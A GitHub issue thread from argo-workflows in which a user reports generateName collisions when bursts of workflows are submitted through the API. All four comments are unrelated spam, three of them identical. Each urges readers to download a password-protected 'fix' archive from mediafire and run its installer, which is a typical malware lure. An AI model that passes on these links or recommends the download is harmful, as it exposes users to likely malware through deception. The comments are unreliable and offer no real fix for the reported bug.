### ISSUE TITLE
Workflow `generateName` collision

### ISSUE THREAD

**Issue by jens-gilion** [argoproj/argo-workflows#13521]
### Pre-requisites

- [X] I have double-checked my configuration
- [X] I have tested with the `:latest` image tag (i.e. `quay.io/argoproj/workflow-controller:latest`) and can confirm the issue still exists on `:latest`. If not, I have explained why, **in detail**, in my description below.
- [X] I have searched existing issues and could not find a match for this bug
- [ ] I'd like to contribute the fix myself (see [contributing guide](https://github.com/argoproj/argo-workflows/blob/main/docs/CONTRIBUTING.md))

### What happened? What did you expect to happen?

Several workflow executions "generate" the same Name (w. generateName) and hence overwriting each other.

(not tested on :latest because I can not risk our prod environment where this happens, and 0.41.14 is quite recent)

We're on 0.41.14 and have an external service that submits workflow executions through the API to `/api/v1/workflows/[ns]/submit`

Our payload is essentially just requesting to submit a named template with some parameters, where the difference between each request is the parameters.

Most of the time it works fine, however when we get a burst of workflows to execute (15 or so within a second), it often happens that several of them get the same name generated, and hence the last submitted will overwrite the first.

I suspect it has to do with how the randomised part of the generated name is created, as it should be 'random' enough with 5 random letters to handle these relatively low volumes without collisions.

### Version(s)

0.41.14

### Paste a minimal workflow that reproduces the issue. We must be able to run the workflow; don't enter a workflows that uses private images.

```YAML
Any workflow should do
```

### Logs from the workflow controller

```text
Hard to reproduce
```

### Logs from in your workflow's wait container

```text
Hard to reproduce
```

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
